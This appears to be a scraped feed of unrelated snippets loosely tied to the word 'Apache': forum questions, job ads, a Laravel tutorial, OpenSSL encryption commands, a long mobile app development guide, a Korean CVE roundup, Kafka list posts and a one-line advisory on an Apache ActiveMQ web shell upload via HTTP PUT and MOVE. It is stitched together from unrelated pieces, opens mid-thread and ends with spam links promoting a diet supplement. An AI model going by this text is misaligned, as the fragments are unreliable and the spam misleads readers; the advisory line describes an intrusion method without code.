
The file is there as opposed to entirely missing. Am I looking at ownership or permissions issues do you think or something else?

Any suggestions of where to start to try to get to the bottom of it please.

Thank you 

Heather


          Documentation Improvements for 2.0   

Since Accumulo 1.7, the Accumulo user manual source resided in the source repository as asciidoc. For every release or update to the manual, an HTML document is produced from the asciidoc, committed to the project website repository, and published to the website. This process will remain for 1.x releases.

For 2.0, the source for the user manual was converted to markdown and moved to the website repository. The upcoming 2.0 documentation has several improvements over the older documentation:

  • Improved navigation using a new sidebar
  • Changes to the documentation are now immediately viewable on the website
  • Better linking to Javadocs and between documentation pages
  • Documentation style now matches the website

While the unreleased documentation is viewable, it is not linked to (except by this post) and every page contains a warning that the documentation is for a future release. Each page also links to the documentation for the latest release.

It is now much easier to view, edit, and propose changes to the documentation. If you would like to contribute to the documentation for 2.0, view the unreleased documentation. Each page has an Edit this page link that will take you to GitHub where you can edit the markdown for the page, preview it, and submit a pull request to the website repository. A committer will review your changes so don’t be afraid to contribute!


          Curl error 60 on DP8 but not DP7 (same setups)   

I just set up a WAMP server and am looking to migrate my DP7 site to DP8

Was getting the cURL error 60: on both when doing module installs through /admin/modules/install so i applied the only solution that anyone ever gives here... https://www.drupal.org/node/2654474

-> Download latest cacert.pem (As txt file) from http://curl.haxx.se/docs/caextract.html
-> Add curl.cainfo = [enter your path]\cacert.pem to your php.ini
-> Restart Apache service

Now updates and installs work on the DP7 site but not the DP8 site.

These sites are both in the same wamp64/www folder, using the same PHP, so why does the DP8 one fail? I really feel like there is another step that i just can't find in the forums or actually anywhere...

Any ideas?

Drupal version: 

          Middleware Admin Senior - Capgemini - Sama, Asturias   
Middleware Admin Senior - Asturias Capgemini Provincia: Langreo - Asturias - España Funciones: Administrador jboss weblogic apache iis Idiomas: Inglés ...
De Capgemini - Fri, 23 Jun 2017 13:17:48 GMT - Ver todo: empleo en Sama, Asturias
          Iniciando projeto com laravel – parte 1   

Seja bem vindo a série Iniciando projeto com laravel, na primeira parte veremos como criar um projeto, as principais pastas da estrutura e configuração do banco de dados.   CONFIGURAÇÕES GERAIS Para iniciarmos precisamos configurar algumas coisas. Como o foco não é banco de dados, utilizaremos o xampp. Você pode baixá-lo aqui: https://www.apachefriends.org/pt_br/download.html Para configurar […]

---
Este artigo foi escrito por Tailo Mateus Gonsalves.

Visite o nosso site para mais posts sobre desenvolvimento web! Tableless.


          Sr. Software Engineer - ARCOS LLC - Columbus, OH   
Oracle, PostgreSQL, C, C++, Java, J2EE, JBoss, HTML, JSP, JavaScript, Web services, SOAP, XML, ASP, JSP, PHP, MySQL, Linux, XSLT, AJAX, J2ME, J2SE, Apache,...
From ARCOS LLC - Tue, 13 Jun 2017 17:31:59 GMT - View all Columbus, OH jobs
          Encrypter un fichier volumineux avec une paire de clés publique et privée.   

cadenaSsl
Voici une petite procédure pour encrypter un fichier volumineux avec la librairie OPENSSL. Utile si vous souhaitez encrypter un fichier volumineux et le partager avec une personne qui devra disposer de la clé pour le décrypter et l'utiliser.

Créer une paire de clé

Pour info la clé sera valable pendant 100000 jours ;)

openssl req -x509 -nodes -days 100000 -newkey rsa:2048  -keyout /home/draggi/keys/privKey.pem  -out /home/draggi/keys/pubKey.pem  -subj '/'

Encrypter le fichier volumineux

Encrypter par exemple un gros fichier de LOG APACHE à laide de la clé publique.

openssl  smime  -encrypt -aes256  -in /var/log/apache2/www.draggi.net.access.log.2.gz  -binary  -outform DEM  -out www.draggi.net.access.log.2.gz.enc /home/draggi/keys/pubKey.pem

Décrypter le fichier volumineux.

Décrypter le fichier à l'aide de la clé privée.

openssl  smime -decrypt  -in www.draggi.net.access.log.2.gz.enc  -binary -inform DEM -inkey /home/draggi/keys/privKey.pem  -out  www.draggi.net.access.log.2.gz

          Sr. DevOps Engineer - Elastic Search (EKL) (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linix, Microsoft, Oracle, SQL server, MySQL, MongoDB, SSH, web and app technologies (IIS, apache, tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:23 GMT - View all Saint Paul, MN jobs
          Sr. DevOps Engineer - Splunk & AppDynamics (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linix, Microsoft, Oracle, SQL server, MySQL, MongoDB, SSH, web and app technologies (IIS, apache, tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:23 GMT - View all Saint Paul, MN jobs
          Sr. DevOps Engineer - CI/CD Jenkins (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linix, Microsoft, Oracle, SQL server, MySQL, MongoDB, SSH, web and app technologies (IIS, apache, tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:22 GMT - View all Saint Paul, MN jobs
          Sr. DevOps Engineer - Performance & Load Testing (Local candidates only) - Whiting House Technologies - Saint Paul, MN   
Unix/Linix, Microsoft, Oracle, SQL server, MySQL, MongoDB, SSH, web and app technologies (IIS, apache, tomcat, JBoss), VMware, AD and Storage/SAN....
From Whiting House Technologies - Tue, 16 May 2017 12:38:08 GMT - View all Saint Paul, MN jobs
          Cloud Security DevOps Engineer - Verizon - Basking Ridge, NJ   
AWS,Apache , Redis , MySQL &amp; Postgres , MongoDB , Ansible , Splunk , Github , Jenkins , and JIRA &amp; Confluence....
From Verizon - Thu, 29 Jun 2017 10:58:12 GMT - View all Basking Ridge, NJ jobs
          Apache Corp   

(A Top Pick April 18/16. Down 8.31%.) He sold this and got about 5.5% from it.


          Comment on How do I setting a proxy for HttpClient? by Wayan Saryada   
Hi Naveen, The example requires the <code>commons-httpclient-3.x.jar</code>. When using maven all other dependencies will be downloaded. In this case the <code>DecoderException</code> class is part of the Apache Commons <code>commons-codec-1.2.jar</code>.
          Comment on How do I setting a proxy for HttpClient? by Naveen   
Hi Wayan Saryada, Which version of the jar should use for this program. I am getting <code>NoClassDefFoundError</code> error. Please suggest me. <pre><code>Exception in thread "main" java.lang.NoClassDefFoundError: org/apache/commons/codec/DecoderException at org.apache.commons.httpclient.HttpMethodBase.(HttpMethodBase.java:217) at org.apache.commons.httpclient.methods.GetMethod.(GetMethod.java:88) at HttpClientTest.main(HttpClientTest.java:19) Caused by: java.lang.ClassNotFoundException: org.apache.commons.codec.DecoderException at java.net.URLClassLoader$1.run(URLClassLoader.java:366) at java.net.URLClassLoader$1.run(URLClassLoader.java:355) at java.security.AccessController.doPrivileged(Native Method) at java.net.URLClassLoader.findClass(URLClassLoader.java:354) at java.lang.ClassLoader.loadClass(ClassLoader.java:425) at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:308) at java.lang.ClassLoader.loadClass(ClassLoader.java:358) ... 3 more </code></pre>
          최신보안 취약점 입니다   
최신 보안 취약점! 버그리포트 참고하세요안녕하세요? 양정규 팀장 입니다. 요즘 다시 랜섬웨어로 인해 보안 업계가 시끌시끌 하죠.페티야 랜섬웨어뿐 아니라 다양한 사이버 위협이 증가하고 있으니 항상 주의하시기 바라며, 안내 드리는 National Vulnerability Database발표 최신 보안 취약점 내용도 참고 하시기 바랍니다. 그럼 오늘도 행복하고 건강한 하루 만드세요~! 1. CVE-2017-5241 Biscom Secure File Transfer 5.1.1015 버전 및 이전 버전의 Workspace의 Name과 Description 필드의 XSS 취약점으로 5.1.1025 버전에서 픽스가 되었다.2. CVE-2017-7686 Apache Ignite 1.0.0-RC3~2.0 버전의 업데이트 알림 요소의 취약점으로, 해당 요소.......
          Mobile App Development Process   

Each day thousands of mobile apps are published to the Google Play and Apple App Stores. Some of these mobile apps are games, others are social networks, and many are ecommerce apps. All of these apps, if professionally built, should follow a similar mobile app development process. At BHW, we have built over 350 web and mobile apps and in this article I will outline the strategy, design, and development processes we follow.

Each app is different and our methodologies are always evolving, but this is a fairly standard process when developing mobile apps. This mobile app development process typically includes idea, strategy, design, development, deployment, and post-launch phases.

Idea

As trite as it sounds, all great apps began as ideas. If you don’t have an app idea, the best place to start is to train yourself to always think of things in terms of problems and potential solutions. You want your brain to instinctively ask “Why do we do things this way?” or “Is there a better way to solve this problem?” If you can identify a problem or market inefficiency, you are half way to your idea!

The next thing to do is understand why this problem exists and think about why nobody else has made an app to solve this problem previously. Talk to others with this problem. Immerse yourself in the problem space as much as possible. Once you have a complete grasp of the problem, begin to evaluate how a mobile app could solve the problem.

This is where having some understanding of what mobile apps can do is extremely valuable. We are frequently asked, “Is this even possible?” Fortunately, the answer is often yes, but it is imperative that this answer is sound. You are about to invest a considerable amount of time and money into an app, now is the time to challenge your idea’s validity and viability.

Strategy

Mobile App Process - Strategy Diagram

Competition

Once you have an idea, you need to plan for your app’s success. One of the best places to start is by identifying your competition. See if any other apps serve a similar purpose and look for the following:

  • Number of installs - See if anyone is using these apps.
  • Ratings and reviews - See if people like these apps and what they like/dislike about them.
  • Company history - See how these apps have changed over time and what sort of challenges they faced along the way. Try to see what they did to grow their user base.

There are two main goals of this process. First, learn as much as you can for free. Making mistakes is time consuming, frustrating, and expensive. Often, you have to try a few approaches before getting it right. Why not save yourself a few iterations, by learning lessons from your competitors? The second is to understand how hard it will be to compete in the marketplace. Are people hungry for a new solution? Is there some niche not being filled by the existing options? Understand what gaps exist and tailor your solution to meet them. If your idea is completely new, find other “first to market” apps and study how they educated consumers about their new product.

Monetization

Unless you just enjoy building apps for their own sake, you are probably hoping to make money on your mobile app. There are several methods of monetization that could work, including: in-app purchases, subscription payments, premium features, ad-revenue, selling user data, and traditional paid apps. To determine which is best for your app, look to see what the market expects to pay and how they expect to pay for similar services. You also need to consider at what point you begin monetizing your app. Far too many apps (particularly startups) skip this step and have a hard time later turning a profit.

Marketing

This step in the mobile app development process is all about identifying the biggest challenges you will face when marketing your app. Assuming you have a reliable app development and app design team, your biggest hurdles will likely be driving app adoption. There are thousands of beautiful and quite useful apps on the app stores that simply go unused. At this point you need to understand what your marketing budget and approach will be. In some cases (like internal-use apps or B2B apps) you might not even need marketing.

Road Map (MVP)

The final stage of the strategy process is defining your app’s roadmap. The goal of this process is to understand what your app could one day become and what it needs to be successful on day one. This day one version is often called your Minimum Viable Product (MVP). During this process, it can be helpful to write on a whiteboard all of the things you want your app to do. Then begin ranking these items by priority. Consider what your app's core functionality will be, what is needed to gain users, and what can be added later. If there are some features you think users might want, they are likely great candidates for later versions. As you gain users with your MVP, you can solicit feedback on what additional features are desired. App monitoring (covered later in this article) can also assist in this process.

User-Experience Design

Mobile App Process - UX Design Diagram

Information Architecture

Information architecture is the process in which you decide what data and functionality needs to be presented within your app and how that data and functionality is organized. Typically, we begin this process by writing down a list of features we want the app to perform and a list of what needs to be displayed somewhere in the app. These are the basic building blocks with which we will build the wireframes.

Tools we use: Whiteboards and Pencil & paper

Wireframes

Next, we begin creating screens and assigning each functions and data. It is ok if somethings live in multiple places, but you need to make sure each item has a home. This process often takes place on whiteboards or paper initially. You want to make changes here, rather than later in the process, because it is much cheaper to erase some marks than to rewrite code. Once you have several screens drawn up, begin considering your app’s workflows.

Tools we use: Whiteboards, Pencil & paper, balsamiq, and Sketch

Workflows

Workflows are the pathways users can travel within your app. Consider each of the things you want your users to be able to do and see how many clicks are needed to complete that action. Make sure each click is intuitive. If something takes a few clicks to accomplish, that might be fine, but it should not take a few clicks to perform common tasks. As you find problems with your workflows, update your wireframes and try again. Remember to run through all of your features in each iteration, just to make sure you did not increase the difficulty of one action in an attempt to improve another.

Tools we use: Whiteboards, Pencil & paper, Invision

Click-through models

Click-through models help you test your wireframes and workflows. They are basically a way to experience your wireframes on a phone for more realistic testing. For example, our clients simply receive a link, which when opened on their phone allows them to click through the wireframe. Although the app has no functionality at this point, they can click on each page in the app and begin testing the app’s navigation. As you find issues in this step, make changes with your wireframes and iterate until you are satisfied.

Tools we use: Invision

User-Interface Design

Mobile App Process - UI Design Diagram

Style guides

Style guides are basically the building blocks of your app’s design. Having a sound style guide will help tremendously with your app’s usability. You don’t want your call to action button on one screen to be at the bottom and blue, but green and in the header on another screen. By having a consistent design language, users are more likely to be comfortable within your app.

There is a lot that goes into determining an app’s style guide. You need to consider who you are and who your customers will be. Is your app going to be used at night? Then maybe a dark theme will work best, as to not blind your users. Will it be used mostly by busy employees? Try to keep clutter to a minimum and get your main point across. An experienced designer or design team has a wide range of output and can deliver an app that is a great fit for you and your customers. The output of this phase is a set of colors, fonts, and widgets (buttons, forms, labels, etc.) that will be drawn from in the design of your app.

Rendered designs

Rendered design is the process of taking your wireframes and replacing the grayscale elements with elements from your style guide. There should be a rendered screen for each wireframe screen. Try to stay true to your style guide in this process, but you don’t have to be dogmatic about it. If you find yourself wanting a new or changed style, feel free to update or amend your style guides. Just make sure your design is consistent when this stage is complete.

Tools we use: Whiteboards, Pencil & paper, and Sketch

Rendered Click-through models

Once you have all your screens rendered, return to your click-through model application and test your app again. This is the step in the mobile app development process where you really want to take your time. Although a considerable amount of effort has already gone into the app, after this point changes can become increasingly costly. Think of this as reviewing a floor plan before your home’s concrete is poured. Fortunately, mobile app development is a bit more adaptive than construction, but thinking of it in these terms can be the most cost-effective.

Tools we use: Invision

Design-to-Development Handoff

After having put in so much effort into the form and function of your app, it is imperative that this vision is properly realized by your development team. It always amazes me how often this step in the mobile app development process goes poorly. Perhaps this is due to many organizations and agencies only providing design or development services or the sometimes combative relationship between designers and developers. Whatever the reason, I highly recommend finding a team that can provide both design and development services and can properly handle this step in the process.

Part of what helps ensure a smooth transition and exact implementation is the proper use of the available tools. We like using an application called Zeplin, which helps developers quickly grab style guides for the design. But, this is not foolproof. Zeppelin is a great tool, but sometimes its guides are not exact or not the best implementation (it can use explicit dimensions, rather than dynamic ones for example). In those situations, it is immensely beneficial if your developers can also use design applications (such as Sketch or Photoshop). The important thing here is that your team does not simply best guess at dimensions, hex values (colors), and positioning. Your design team put in tremendous effort to ensure things were properly aligned and positioned. Your development team’s goal should always be a pixel-perfect implementation.

Tools we use: Zeplin

High-level Technical Design (Tech Stack)

There are numerous approaches, technologies, and programing languages that can be used to build a mobile app. Each with its own strengths and shortcomings. Some might be cheaper to use, but are less performant, whereas others might take longer to implement and be overkill. The worst possibility is building on a dying or unreliable technology stack. If you make this mistake, you might have to rebuild your app or pay a premium for developers moving forward. That is why having a trusted development partner that is seasoned in making these decisions is vital in this process.

Front-end (the mobile app)

For front-end development, there are basically 3 approaches. They are platform-specific native, cross-platform native, and hybrid. Here is a brief overview of each approach and some articles that delve into each with greater details.

  • Platform-specific Native - Apps built with this approach are written separately for each mobile platform. Code can’t be reused between Android and iOS, but these apps can be fully optimized for each platform. The UI can look entirely native (so it will fit in with the OS) and the app should work fluidly. This is often the most expensive approach, but is very tried and tested.

  • Cross-platform Native - Apps built with this approach have some (or entirely shared) code, but still run natively. Common technologies used for this are React Native, Xamarin, and Native Script. This is a nice middle ground between the various approaches in that it is more cost-effective, but can still be optimized and styled for each platform.

  • Hybrid - Hybrid apps are built using web technologies (HTML, CSS, Javascript) and are installed via a native wrapper. This can be done using technologies such as Cordova, Phone Gap, and Ionic. This option can be the cheapest, but also presents some very real difficulties.

Back-end (Web API & Server)

The server is responsible for much of your app’s performance and scalability. The technologies used here are similar to those used to power web-based applications. Here are a few things you have to decide before writing code:

  • Language - There are dozens of languages that can be used to build your API. Common languages used are Java, C#, Go-lang, javascript, PHP, and Python. Most languages also have numerous frameworks that can be utilized.

  • Database - There are two main types of modern databases. SQL and noSQL. SQL is more traditional and the best choice in almost all cases. Common SQL implementations include MSSQL, MYSQL, and PostgreSQL. In addition to selecting a database engine, you have to design your particular database schema. Having reliable and well organized data is crucial to your long term success. So, make sure this is well thought out.

  • Hosting Environment (Infrastructure) - In this step you need to decide where and how your API and database will be hosted. Decisions made here will help determine the hosting costs, scalability, performance, and reliability of your application. Common hosting providers include Amazon AWS and Rackspace. Beyond picking a provider, you need to plan how your system will scale as your user base grows. Cloud-based solutions allow you to pay for resources as a utility and scale up and down as needed. They also help with database backups, server uptime, and operating system updates.

Development & Iteration

Mobile App Process - Development Diagram

Sound mobile app development is an iterative process. You have likely heard the term “sprints” or “agile methodology”. This basically means that you break up all development work into smaller milestones and build your app in a series of cycles. Each cycle will include planning, development, testing, and review. There are entire books written on this process, so this article will just provide a brief overview of each step. If your company elects to use another process, these steps will be quite similar, but the order and length of each might vary.

Planning

The planning phase of a sprint involves dividing up the list of tasks to be implemented during the current iteration. Each task needs clearly defined requirements. Once these requirements are understood by developers, they will often estimate the time needed to complete each task, so that the tasks can be evenly distributed to ensure a balanced workload during the sprint.

Developers also begin planning their approach to solving their assigned problems during this phase. Skilled software developers find ways to intelligently reuse code throughout an application. This is especially important for implementing styles and shared functionality. If a design needs to be changed (believe me, something will change), you don’t want to have to go and update code in numerous places. Instead, well designed software can be changed in select places to make these sorts of sweeping changes.

Development

During the development phase your development team will begin implementing the styles and functionality of your app. As they are completed, they are assigned back to a project manager or QA tester for review. Good project managers are able to fully optimize developer workloads during this process by properly redistributing assignments throughout the sprint.

It is important that your development team fully understand the goals of the application as a whole and for the specific feature they are working on. Nobody is more in-tune with that particular feature than the assigned developer. They should understand the intent of the requirements. If something starts to not make sense, it is often developers who will be the first to let you know.

During development, we use a platform called Hockey App. It allows us to privately and securely distribute the in-development version of the app to testers, clients, and other developers. Hockey automatically notifies users of new builds (so everyone is testing the latest & greatest), provides crash reporting, and can ensure only approved testers have access to your app. It is a great way to keep everyone up to speed on progress. During development, we try to update Hockey once or twice a week.

Testing

Most testing should be performed by non-developers or at least people who are not your app’s primary developer. This will help ensure a more genuine testing experience. There are several types of testing that should occur during each sprint. These typically include the following:

  • Functional Testing - Testing to ensure the feature works as described in the requirements. Usually, a QA team will have a test plan with a list of actions and the desired app behavior.

  • Usability Testing - Testing to ensure the feature is user-friendly and is as intuitive as possible. Often it is helpful to bring in new testers for a “first-use” experience during this step.

  • Performance Testing - Your app might work perfectly, but if it takes 20 seconds to display a simple list, nobody is going to use it. Performance testing is typically more important in later sprints, but keep an eye on the app’s responsiveness as you move along.

  • Fit and Finish Testing - Just because the design phase is complete past, doesn't mean you can lock your designers in a closet. Designers should review each feature and ensure that their vision was implemented as described in the design. This is another reason why having one agency for both design and development is so beneficial.

  • Regression Testing - Remember that one feature from the previous sprint? Don’t assume it still works, just because you tested it last month. Good QA teams will have a list of tests to perform at the end of each sprint, which will include tests from previous sprints.

  • Device-Specific Testing - There are tens of thousands of device and operating system combinations in the world. When testing, make sure you try out your app on numerous screen sizes and OS versions. There are tools that can help automate this, such as Google’s Firebase, but always test the app on at least a handful of physical devices.

  • User Acceptance Testing - This is testing performed by either the app owner or future app users. Remember who you are building this app for and get their feedback throughout the process. If a feature passes all the above tests, but fails this one, what use is it?

As problems are discovered in this phase, reassign tasks back to developers so that the problems can be resolved and the issues closed out. Once testing has been completed and each task is done, move on to review.

Review

At the end of each sprint talk with each of the stakeholders and determine how the sprint went. If there were difficulties, try to eliminate similar issues from future sprints. If things went well in one area, try to apply them elsewhere. No two projects are the exact same and everyone should always be advancing in their roles, so aim to improve, while you iterate. Once review is complete, begin again with the planning phase and repeat this process until the app is done!

Extended Review

At this point your app should be fully testable and feature complete (at least for the MVP). Before you spend a sizable amount of time and money on marketing, take the time to test your app with a sample of your potential users. There are two main ways to go about this.

Focus Groups

Focus groups involve conducting an interview with a tester or group of testers who have never seen the app before and conduct an interview. You want to understand who these testers are, how they learn about new apps, and if they use similar apps already. Try to get some background info out of them before even getting into your product. Next, let your testers begin using your app. They should not be coached during this process. Instead, let them use the app as if they had just found it in the app store. See how they use the app, and look for common frustrations. After they are done using the app, get their feedback. Remember to not be too strongly guided by any one tester, but combine feedback and make intelligent decisions using all available feedback.

Beta Testing

In addition to, or instead of focus groups, you can do a beta launch of your app. Beta tests involve getting a group of testers to user your app in the real world. They use the app just as if it had launched, but in much smaller numbers. Often these beta testers will be power users, early adopters, and possibly your best customers. Make sure they feel valued and respected. Give them ample opportunities to provide feedback and let them know when and how you are changing the app. Also, beta testing is a great time to see how your app performs on various devices, locations, operating systems, and network conditions. It is imperative that you have sound crash reporting for this step. It does you no good if something goes wrong, but is not discovered and diagnosed.

Refinement

After these extended review periods, it is common to have a final development sprint to address any newly discovered issues. Continue beta testing during this process and ensure that your crash and issue reports are declining. Once you have the all-clear from your testers, it is time to begin preparing for deployment.

Deployment

Mobile App Process - Deployment Diagram

There are two main components to deploying your mobile app into the world. The first involves deploying your web server (API) into a production environment that is scalable. The second is deploying your app to the Google Play Store and Apple App Store.

Web API (Server)

Most mobile apps require a server back-end to function. These web servers are responsible for transferring data to and from the app. If your server is overloaded or stops working, the app will stop working. Properly configured servers are scalable to meet your current and potential user base, while not being needlessly expensive. This is where the “cloud” comes in. If your server is deployed to a scalable environment (Amazon Web Services, RackSpace, etc.), then it should be able to better handle spikes in traffic. It is not terribly difficult to scale for most mobile apps, but you want to ensure your team knows what they are doing or your app could fall apart, just when it gets popular.

App Stores

Submitting your apps to the app stores is a moderately involved process. You need to make sure your apps are properly configured for release, fill out several forms for each store, submit screenshots and marketing materials, and write a description. Additionally, Apple manually reviews all apps submitted to their app store. It is possible they will request you make changes to your app to better comply with their regulations. Often, you can discuss these changes with Apple and get them to accept your app as-is. Other times, you might have to make changes to be granted entrance. Once your app is submitted, it will be live in Google later that day and in Apple within a few days, assuming everything goes smoothly.

Monitoring

Mobile App Process - Monitoring Diagram

It would be incredibly naive to think that the mobile app development process ends when the app is shipped. Go look at any even moderately popular apps and you will see a long history of app updates. These updates include fixes, performance improvements, changes, and new features. Thorough monitoring is essential to best understand what sort of updates are needed. Here are a few things you should be monitoring.

Crashes

There are numerous libraries that can be used to reliably track app crashes. These libraries include information about what the user was doing, what device they were on, and plenty of technical info that is crucial for your development team in resolving the problem. Apps can be configured to send an email/text/alert when crashes occur. These crashes can be viewed and triaged accordingly.

Tools we use: Sentry and HockeyApp

Analytics

Modern app analytics systems are are treasure trove of information. They can help you understand who is using your apps (age, gender, location, language, etc.) and how they are using it (time of day, time spent in app, screens viewed in app, etc.). Some even allow you to view heat maps of your app, so you know what buttons on each screen are clicked most often. These systems provide an invaluable glimpse into how your app is being used. Use this information to best understand where to invest future efforts. Don’t build onto portions of the app that are seldom utilized, but invest where there is action and the largest potential for growth.

Tools we use: Facebook Analytics, Apptentive, Google Analytics, and Appsee

Performance

One vital metric not covered by the previous two monitoring categories is your apps technical performance, i.e. how quickly it works. Any system we deploy has extensive performance monitoring in place. We are able to track how many times an action occurred and how long that action took. We use this to find areas ripe for optimization. We also put alerts in place to let us know if a particular action is slower than expected, so we can quickly look to see if there are any issues. These performance tools typically have dash-boarding, reporting, and alerting functionality included.

Tools we use: Prometheus

App Store Management

App store ratings and reviews are extremely important, particularly for newer apps. Whenever a new review is left on your listing, make sure to engage the reviewer. Thank users who give you great reviews and try to assist those who were frustrated. I have seen hundreds of poor reviews changed to 5-stars just with a little customer service. Users don’t expect app developers and owners to provide a hands-on level of service and that help goes a long way in boosting your online reputation.

Further Iteration and Improvement

The purpose of all this monitoring is to know what you need to do next. Most apps are never really done. There are always new features that can be added and things that can be improved upon. It would be incredibly wasteful to blindly build on your app. Use the information you have received from your users and your monitoring platforms. Then repeat parts of this mobile app development process (don’t worry, many steps are much easier each after the first pass). Continue to improve your app, your conversion rates, your install base, and of course your revenue. Mobile apps are fluid. Take advantage of that by continuing to grow and improve.

Conclusion

The mobile app development process might seem overwhelming and involved. There are a lot of steps and difficult decision making is required along the way. But, it is an extremely rewarding process and can be quite lucrative. Also, there might be some temptation to skips steps in this process, but this guide is built upon years of experience working with app owners that chose to skip certain steps.

If you are looking to build your next (or first) mobile app and need help with one or more of these steps, you’re in luck! The BHW Group welcomes app owners at any stage in this process. Whether you are a startup or Fortune 50 company, we have the team and knowledge needed to deliver a fantastic mobile app. Please don’t hesitate to contact us today.


          Automation Engineer - Marin Software - San Francisco, CA   
AngularJS, Hadoop, Hive, Presto, HBase, Apache Phoenix, Pig and Kafka. Out with the manual testing, in with the 100% automated testing and the continuous...
From Marin Software - Tue, 13 Jun 2017 18:37:50 GMT - View all San Francisco, CA jobs
          Technical Quality Engineer Lead - Marin Software - San Francisco, CA   
Understand the business and key drivers for success. JS Angular, Hadoop, HBase, Hive, Presto, HBase, Apache Phoenix, Spark, Scala, Pig and Kafka....
From Marin Software - Mon, 15 May 2017 22:30:30 GMT - View all San Francisco, CA jobs
          [Kafka-users] Fail to build examples with gradle on Kafka using JDK 8 (Philippe Derome)   
The issue had apparently existed and is apparently resolved, but so far it does not work for me: https://issues.apache.org/jira/browse/KAFKA-2203. I issue same command as Stevo Slavic with JDK ... -- Philippe Derome
          [Kafka-users] General Question About Kafka (Ali)   
Hello Guys. We are going to install Apache Kafka in our local data center and different producers which are distributed across different locations will be connected to this server. Our Producers will ... -- Ali
          [Kafka-users] Please include me in kafka users group (Srikanth Hugar)   
Hi, I started working on Apache Kafka and want to be included in users group. Please include me. Thank you. Best Regards, Srikanth. -- Srikanth Hugar
          [Kafka-users] Kafka controller replica state docs outdated? (Stevo Slavić)   
Hello Apache Kafka community, Is it intentional that not all states (like ReplicaDeletionIneligible) are documented on https://cwiki.apache.org/confluence/display/KAFKA/Kafka+Controller+Internals or ... -- Stevo Slavić
          Deep learning on Apache Spark and Apache Hadoop with Deeplearning4j   
爱可可-爱生活   网页版 2017-06-29 19:55 架构 经验总结 深度学习 Hadoop Nish […]
          Apache Tonto hältdie Stellung   
Nach vier Jahren in Butjadingen hat Capitano Ol endlich sein Schiff, die Santa Maria, repariert. Nun ist er nach Brasilien unterwegs, um dort ...
          Automation Engineer - Marin Software - San Francisco, CA   
AngularJS, Hadoop, Hive, Presto, HBase, Apache Phoenix, Pig and Kafka. Out with the manual testing, in with the 100% automated testing and the continuous...
From Marin Software - Tue, 13 Jun 2017 18:37:50 GMT - View all San Francisco, CA jobs
          Technical Quality Engineer Lead - Marin Software - San Francisco, CA   
Understand the business and key drivers for success. JS Angular, Hadoop, HBase, Hive, Presto, HBase, Apache Phoenix, Spark, Scala, Pig and Kafka....
From Marin Software - Mon, 15 May 2017 22:30:30 GMT - View all San Francisco, CA jobs
          Amazon Prime Day UK July 11   
https://www.amazon.co.uk/gp/b/ref=pe_3460351_200032281_pe_btn/?node=10157705031 Also in the US. https://www.amazon.com/Prime-Day/b?ie=UTF8&node=13887280011 Apache
          دیدگاه‌ها برای استاد وردپرس ۳ : نصب و راه اندازی وردپرس با امیر   
سلام دوست عزیز سال نو مبارک ممنون از مطالب خوبت وقتی میخوام تو نرم افزار xampp گزینه اول یعنی apache فعال کنم با ارور Error: Apache shutdown unexpectedly. مواجه میشم .ممنون میشم راهنمایی کنید
          US Air Force Attaches High-Energy Laser to AH-64 Apache Attack Helicopter   
The era of laser weaponry is upon us. The U.S. Army in partnership with Raytheon recently unveiled an AH-64 Apache attack helicopter modified with a high-energy laser weapon. The Apache helicopter has a fully integrated laser system successfully used to shoot several targets. [Image Source: Raytheon] Raytheon recently released a video of the weapon’s system in use […]
          Apache ActiveMQ 5.x Web Shell Upload   
The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. - Source: packetstormsecurity.com
          12265 Senior Programmer Analyst - CANADIAN NUCLEAR LABORATORIES (CNL) - Chalk River, ON   
Understanding of server technologies (Internet Information Server, Apache, WebLogic), operating systems (Windows 2008R2/2012, HP-UX, Linux) and server security....
From Indeed - Wed, 07 Jun 2017 17:50:30 GMT - View all Chalk River, ON jobs
          The U.S. Army Attached Laser Cannons To Apache Attack Helicopters   

Long Story Short

Real-life star wars just got a whole lot closer as the U.S. Army revealed it's testing high-energy laser cannons on Apache attack helicopters and military vehicles.

Long Story

From Star Wars to Austin Powers, laser beams have been prophesized as the weapon of the future, but it's 2017 and we're still without frickin' laser beams. What gives?

Sure, we've had lasers on weapons and he...


          آموزش PluralSight Understanding Apache Flink   

آپاچی Flink از مجموعه ابزارهای نسل چهارم پردازش بیگ دیتایست. با توجه به حجم داده های که همه روزه به صورت آفلاین و آنلاین یا زنده و غیر زنده تولید شده و نیاز است که آن ها را پردازش و تحلیل کرد ، خوب است که با مشاهده این ک...


          ApacheBench 绿色汉化版   
Apache HTTP server benchmarking tool,工具程式()是网站伺服器软体的一个附带的工具软体,专门用来执行网站服务器的运行效能,特别是针对Apache 网站服务器。需要的朋友不妨到绿盟小站下载体验lor~

下载:ApacheBench 绿色汉化版
          (Apache) https://www.bungie.net/en/Application/Detail/16363 - uiyegas   

https://www.bungie.net/en/Application/Detail/16363


          (Apache) https://www.bungie.net/en/Application/Detail/16360 - uiyegas   

https://www.bungie.net/en/Application/Detail/16360


          (Apache) https://www.bungie.net/en/Application/Detail/16359 - uiyegas   

https://www.bungie.net/en/Application/Detail/16359


          (Apache) http://bettercoloncleansingguide.com/lifeglo-garcinia/ - Bhigicuuuttz   

LifeGlo Garcinia Once your eating routine change from meaningless to deliberate , almost any nutrient-limited diet can work in the short-run . Your Weight Loss diet program that is best , nevertheless Weight Loss , will help you to make changes in lifestyle that you could sustain within the long term . http://bettercoloncleansingguide.com/lifeglo-garcinia/


          (Apache) https://www.bungie.net/en/Application/Detail/16332 - uiyegas   

https://www.bungie.net/en/Application/Detail/16332


          “San Juaneando” por las Festividades Tradicionales de Cócorit, Sonora.   

Ahora que andamos turisteando por el sur del estado de Sonora fue grato asistir a las celebraciones del Día de San Juan en la Comisaría de Cócorit  gozando del micro clima caluroso y húmedo del río Yaqui al bajarme del camión frente a la explanada del barrio de El Conti porque necesitaba unas fotografías de su imagen en la iglesia del Espíritu Santo.

